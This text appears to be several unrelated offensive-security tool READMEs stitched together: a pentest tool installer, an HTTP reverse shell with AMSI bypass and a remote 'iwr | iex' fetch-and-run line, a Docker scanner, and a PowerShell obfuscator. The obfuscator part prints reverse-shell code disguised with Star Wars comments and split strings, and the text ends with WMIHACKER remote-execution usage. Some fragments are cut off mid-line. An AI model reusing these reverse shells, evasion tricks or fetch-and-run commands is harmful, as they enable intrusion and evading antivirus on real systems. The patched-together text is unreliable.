[31] Utilities/Windows-Tools
[32] Utilities/chisel
[33] Utilities/cryptz
[34] Utilities/decodify
[35] Utilities/evil-winrm
[36] Utilities/impacket
[37] Utilities/nishang
[38] Utilities/nmapAutomator
[39] Utilities/revshellgen
[40] Web/dirsearch
[41] Web/kadimus
[42] Web/windows-php-reverse-shell
[43] Web/wwwolf-php-webshell
[44] Wordpress/malicious-wordpress-plugin
[45] Wordpress/wordpress-exploit-framework

• PEAS include both linPEAS and winPEAS scripts
• BeRoot include both Linux and Windows scripts

• setup (Setup Process):
  
  • Should be the first command you run.
  • First it will ask if you use .bashrc or .zshrc (built in setup action will not work if you are not using one of the two shell)
  • After that we will setup $SOME_ROOT variable et create a new $PATH
  • After the setup, You can open new terminal tabs/windows or source your shell (.bashrc or .zshrc) in the current terminal to activate the new path. To see you new path after you can do echo $PATH
  • In you shell file (.bashrc or .zshrc), we will copy you $PATH before we make modification. It will be commented few lines before the end of your shell file. So if you want to reset your path to before Some-Tools setup you can copy the command commented in you shell file, cleanup what we created in the file and finally source it.
  • Creation of Bin directory. (bin, bin/PrivEsc-Lin and bin/PrivEsc-Win)
  • You can read the setup section in sometools.sh to have a better understanding.

  $ ./sometools.sh setup

• install and install-all:
  
  • Install one tool or all tools.
  • If you install only one tool, instead of using tool name, you can use is ID number showed when you do ./sometools.sh list.
  • When you will install a tool, it will create a .installed file in the tool dir. This file will help us with our list-installed action.

  $ ./sometools.sh list # see which tool can be install
  # install a tool
  $ ./sometools.sh install LinEnum
  # example using an ID number
  $ ./sometools.sh install 7
  # installing all tools
  $ ./sometools.sh install-all

• install-cat and uninstall-cat:
  
  • Install all tools of a category.
  • Uninstall all tools of a category.

  # install cat
  $ ./sometools.sh install-cat PrivEsc-Win
  # uninstall cat
  $ ./sometools.sh uninstall-cat PrivEsc-Win

• check-update and check-update-all:
  
  • Check update for an installed tool or all installed tools
  • check-update won't update if your tool is not a git repo. So you must manually update tool(s) that didn't contain .git directory.
  • If you check-update only one tool, instead of using tool name, you can use is ID number showed when you do ./sometools.sh list.

  $ ./sometools.sh list-installed # list currently installed tool(s)
  $ ./sometools.sh check-update LinEnum
  # example using an ID number
  $ ./sometools.sh check-update 7
  # example with check-update-all
  $ ./sometools.sh check-update-all

  • Why two check-git ? check-git.sh only tell if the tool is behind or not. If we detect a newer version, we will ask to execute check-git-action.sh.
• self-update:
  
  • That function help keeping this tool (Some-Tools) up to date. If you are behind it will ask you if you want to pull.

  $ ./sometools.sh self-upadte

• uninstall:
  
  • Uninstall an installed tool. No function uninstall-all, I guess at this point you can delete the repo.
  • Instead of using tool name, you can use is ID number showed when you do ./sometools.sh list.

  $ ./sometools.sh uninstall unicorn
  # example using an ID number
  $ ./sometools.sh uninstall 4

• add-tool:
  
  • add-tool will create your new directory in the category you have specified. It will also create 3 files in this directory: install-tool.sh, uninstall-tool.sh and .gitignore.
  • Looking other tools will help you understand how add yours. It's quite easy. Its 3 files, which add-tool action will create for you.
  • When adding a tool I strongly suggest naming the tool the same of their repo. It will be more easy to use check-update action after. But if you want a different name, you can see an example with lse tool in PrivEsc-Lin directory. You may have to change the .gitignore file in your tool directory.
  • If your tool is not a git repo, there is no worry. But you will have to modify install-tool.sh file to fit your needs. If you do so, the check-update action will not work "out of the box" (because we won't find any .git directory). Solution: you can create a file nameupdate-tool.sh (in the tool directory) and put your update commands in it. The some-tools.sh script will detect this file name when using check-update action. Don't forget to chmod +x your new file.
  • .gitignore will contain your tool name and .installed. Why ? Because we dont want to push git repo into another repo and we dont want to push .installed file.

  $ ./sometools.sh add-tool newtoolname PrivEsc-Lin
  # better example ?
  $ ./sometools.sh add-tool LinEnum PrivEsc-Lin

• install-tool and update-tool using scrapy
  Sometimes tool need to be download via the releases/latest page like pspy from DominicBreuker. So to be able to always update and download the latest version, the process needed a little twist with python and scrapy. If you add a new tool using this pattern, you can use the function bellow in your install-tool.sh and update-tool.sh files.
  

  # example with pspy
  # this is not a full script, only a function. Sould be part of an install or/and update script.
  # function that use some-scrapper.py
  function specialTool() {
    urlGit="https://github.com"
    ## You should modify urlTool variable (Should be the only modification)
    urlTool="DominicBreuker/pspy/releases/latest"
  
    # scrapy command
    scrapy runspider $SOME_ROOT/some-scrapper.py -a start_url="$urlGit/$urlTool" -o output.csv >/dev/null 2>&1
    # Preparing txt file before downloading
    mv output.csv output.txt
    sort output.txt | uniq -d | tee output2.txt >/dev/null 2>&1
    rm output.txt
    sed -i -e 's#^#'"$urlGit"'#' output2.txt
  
    # Downloading each line with wget
    while IFS= read -r line; do
      wget $(echo "$line" | tr -d '\r') #> /dev/null 2>&1
    done <output2.txt
  
    # Cleaning up
    rm output2.txt
    rm output2.txt-e
  }
  specialTool

• info:
  
  • Show the README.md file of an installed tool.
  • Instead of using tool name, you can use is ID number showed when you do ./sometools.sh list.
  • Bat or cat ?
  • I love using bat instead of cat, so when info action is used, some-tools will try to detect the bat binary. If it does it will ask you between bat or cat.
  • If you don't know what I'm takling about, don't worry cat will be use by default without asking if no bat detected.

  $ ./sometools.sh info LinEnum
  # example using an ID number
  $ ./sometools.sh info 7

• complete-uninstall:
  
  • Delete all installed tools, remove bin directory and delete our modification in .zshrc or .bashrc
  • We will delete only some-tools section in your .zshrc or .bashrc file. So if you made some modifications along the way, they will be kept.
  • Af the complete uninstall, you shoudl have 3 .zshrc or .bashrc file. One finishing with .backup that we created at the initial setup and the second one, .backup2, before deleting sometools section in the complete-uninstall process.

  $ ./sometools.sh complete-uninstall

# Download Vagrantfile from this repo
$ wget https://raw.githubusercontent.com/som3canadian/Some-Tools/master/Vagrantfile
# start the kali box
$ vagrant up
# connect ssh to the kali box
$ vagrant ssh
# cd into some-tools
$ cd Desktop/Some-Tools
# setup some-tools
$ ./sometools.sh setup
# Verify the installation by:
# 1. open new terminal tab or window
# 2. cd ~/Desktop/Some-Tools
# 3. ./sometools.sh list

• When using the ID number instead of tool name, be sure to use the ID number from ./sometools.sh list and not ./sometools.sh list-installed
• If you add a new tool that need specific update instructions, you can create the file update-tool.sh in the tool dir (like the install-tool.sh and uninstall-tool.sh file). When you will check-update, the some-tools.sh script will take it in consideration.
• You can't use the same name for two tools. It will cause problems. When using add-tool action, we will check for that. A solution for that would be to precise category name when using an action but I really don't want that. Since using a different name is easy, I have no intention for the moment to develop a solution that will let us use the same name for multiple tools.
• Some of the tool you will install may ask you for sudo permissions !
• The check-git.shfile include in the repo is for the check-update and check-update-all actions.
• I'm building this on my free time, may have some bugs. If stars start to grow, I may put more time and effort.

usage: server.py [-h] [--ssl] [--autocomplete] host port

Process some integers.

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions

Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

This server allows multiple connection of clients.
There is a menu with three basic commands: sessions, interact and exit
     - sessions --> show currently active sessions
     - interact --> interacts with a session (Example: interact <session_id>)
     - exit --> close the application

• SSL
• Proxy Aware
• Upload Function
• Download Function
• Error Control
• AMSI bypass
• Multiple sessions [only server-multisession.py]
• Autocomplete PowerShell functions (optional) [only server.py]

• upload /src/path/file C:\dest\path\file

• download C:\src\path\file /dst/path/file

iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/Revshell-Generator.ps1 | iex

• JoelGMSec for his awesome Revshell-Generator.ps1. Twitter: @JoelGMSec
• dev-2null for report the first bug. Twitter: @dev2null

# Download and setup
git clone https://github.com/r0hi7/DockerENT.git
cd DockerENT
make venv
source venv/bin/activate

# Run
python -m DockerENT --help 
usage: Find the vulnerabilities hidden in your running container(s).
       [-h] [-d [DOCKER_CONTAINER]] [-p [DOCKER_PLUGINS]]
       [-d-nw [DOCKER_NETWORK]] [-p-nw [DOCKER_NW_PLUGINS]] [-w]
       [-n [PROCESS_COUNT]] [-a] [-o [OUTPUT]]

optional arguments:
  -h, --help            show this help message and exit
  -w, --web-app         Run DockerENT in WebApp mode. If this parameter is
                        enabled, other command line flags will be ignored.
  -n [PROCESS_COUNT], --process [PROCESS_COUNT]
                        Run sca   ns in parallel (Process pool count).
  -a, --audit           Flag to check weather to audit results or not.

  -d [DOCKER_CONTAINER], --docker [DOCKER_CONTAINER]
                        Run scan against the running container.
  -p [DOCKER_PLUGINS], --plugins [DOCKER_PLUGINS]
                        Run scan with only specified plugins.
  -p-nw [DOCKER_NW_PLUGINS], --nw-plugins [DOCKER_NW_PLUGINS]
                        Run scan with only specified plugins.

  -d-nw [DOCKER_NETWORK], --docker-network [DOCKER_NETWORK]
                        Run scan against running docker-network.

  -o [OUTPUT], --output [OUTPUT]
                        Output plugin to write data to.

• Plugin driven framework.
• Use low level docker api to interact with running containers.
• Clean and Easy to Use UI.
• Comes with 9 docker scan plugins out of which, 6 plugins can audit results.
  • Entire list : Docker Scan Plugins
• Framework ready to work docker-networks.
  • Entire list : Docker Network Scan plugins
• Output plugins can write to file and html sinks.
• The only open source interactive docker scanning tool.
• Can run plugins in parallel.
• Under active development .

• Have some idea to perform runtime scan.
• Copy the same file to create your demo plugin.

cp DockerENT/docker_plugins/docker_sample_plugin.py DockerENT/docker_plugins/docker_demo_plugin.py

• Just make sure, you maintain following structure.

_plugin_name = 'demo_plugin'

def scan(container, output_queue, audit=False, audit_queue=None):
    _log.info('Staring {} Plugin ...'.format(_plugin_name_))

    res = {}

    result = {
        'test_class': {
            'TEST_NAME': ['good']
        }
    }

    res[container.short_id] = {
        _plugin_name_: result
    }

    # Do something magical.

    _log.info('Completed execution of {} Plugin.'.format(_plugin_name_))

    '''Make Sure you put dict of following structure in Q.
    {
        'contiainer_id': {
            'plugin_name': {
                'test_name_demo1': {
                    resultss:[]
                },
                'test_name_demo2': {
                    results: []
                }
            }
        }
    }
    '''
    output_queue.put(res)

    if audit:
        _audit(co   ntainer, res, audit_queue)

def _audit(container, results, audit_queue):
    '''Make Sure to add dict of following structure to Audit Q
    res = {
        "container_id": [
            "_plugin_name_, WARN/INFO/ERROR, details"
        ]
    }
    '''
    # Magical logic to perform Audit.
    audit_queue.put(res)

• Thats it. Still confused, Explain me the idea in Issues and will review and help you out, or we may end up working on it together.
• This plugin will automatically come to drop down in UI.  Easy right.
• Sit back and eval results.

• Rich Logging interface, can help in easy debugging through extensive debug logs.
• Can run in parallel, just pass -n <count>, to specify the processors in parallel.
• Can dump output in JSON and HTML file.

• Audit output is not dumped to file.
• Selecting multiple specific dockers is pain.

• Clean, and easy to use UI.
• Everything at one single page.
• Ease of selecting multilpe docker images, multilpe plugins and multilpe docker-networks.
• Audit report present.

• Logging interface not Rich.
• JSON reports are bulky.
• Rely on third party lib StreamLit, all issues with framework are inherent.

• Create a PR, Issues are more than welcome.
• Try it, test it and enhance it.

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

  # Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.
          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.

  # Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.
           # Heeding B   en’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.
   # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.
           $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.
            $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
   # An imperial boarding party    blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.

$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"

... New-Object $a$b$c$d ...

$CNiJfmZzzQrqZzqKqueOBcUVzmkVbllcEqjrbcaYzTMMd = "`m"
$quiyjqGdhQZgYFRdKpDGGyWNlAjvPCxQTTbmFkvTmyB = "t`Rea"
$JKflrRllAqgRlHQIUzOoyOUEqVuVrqqCKdua = "Get`s"
$GdavWoszHwDVJmpYwqEweQsIAz = "ti`ON"
$xcDWTDlvcJfvDZCasdTnWGvMXkRBKOCGEANJpUXDyjPob = "`L`O`Ca"
$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "`Get`-"
$kvfTogUXUxMfCoxBikPwWgwHrvNOwjoBxxto = "`i"
$tJdNeNXdANBemQKeUjylmlObtYp = "`AsC`i"
$mhtAtRrydLlYBttEnvxuWkAQPTjvtFPwO = "`G"
$PXIuUKzhMNDUYGZKqftvpAiQ = "t`R`iN

sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help

./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

sed -i 's/192.168.56.101/<YOUR-IP-ADDRESS>/g' shells/*.ps1

ls -laR shells/

shells/:
total 60
-rwxrwx--- 1 tokyoneon tokyoneon 1727 Aug 29 22:02 generic1.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 1433 Aug 29 22:02 generic2.ps1
-rwxrwx--- 1 tokyoneon tokyoneon  734 Aug 29 22:02 generic3.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4170 Aug 29 22:02 Invoke-PowerShellIcmp.ps1
-rwxrwx--- 1 tokyoneon tokyoneon  281 Aug 29 22:02 Invoke-PowerShellTcpOneLine.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4404 Aug 29 22:02 Invoke-PowerShellTcp.ps1
-rwxrwx--- 1 tokyoneon tokyoneon  594 Aug 29 22:02 Invoke-PowerShellUdpOneLine.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 5754 Aug 29 22:02 Invoke-PowerShellUdp.ps1
drwxrwx--- 1 tokyoneon tokyoneon 4096 Aug 28 23:27 misc
-rwxrwx--- 1 tokyoneon tokyoneon  616 Aug 29 22:02 powershell_reverse_shell.ps1

shells/misc:
total 36
-rwxrwx--- 1 tokyoneon tokyoneon 1757 Aug 12 19:53 Add-RegBackdoor.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 3648 Aug 12 19:53 Get-Informat   ion.ps1
-rwxrwx--- 1 tokyoneon tokyoneon  672 Aug 12 19:53 Get-WLAN-Keys.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4430 Aug 28 23:31 Invoke-PortScan.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 6762 Aug 29 00:27 Invoke-PoshRatHttp.ps1

• Invoke-Obfuscation
• AMSITrigger
• PSAmsi
• amsi.fail
• Unicorn
• www.wolfandco.com

Disclaimer: The technology involved in this project is only for security learning and defense purposes, illegal use is prohibited!

C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs

__          ____  __ _____   _    _          _____ _  ________ _____
\ \        / /  \/  |_   _| | |  | |   /\   / ____| |/ /  ____|  __ \
 \ \  /\  / /| \  / | | |   | |__| |  /  \ | |    | ' /| |__  | |__) |
  \ \/  \/ / | |\/| | | |   |  __  | / /\ \| |    |  < |  __| |  _  /
   \  /\  /  | |  | |_| |_  | |  | |/ ____ \ |____| . \| |____| | \ \
    \/  \/   |_|  |_|_____| |_|  |_/_/    \_\_____|_|\_\______|_|  \_\
                              v0.6beta       By. Xiangshan@360RedTeam
Usage:
        WMIHACKER.vbs  /cmd  host  user  pass  command GETRES?

        WMIHACKER.vbs  /shell  host  user  pass

        WMIHACKER.vbs  /upload  host  user  pass  localpath remotepath

        WMIHACKER.vbs  /download  host  user  pass  localpath remotepath

          /cmd          single command mode
          host          hostname or I   P address
          GETRES?       Res Need Or Not, Use 1 Or 0
          command       the command to run on remote host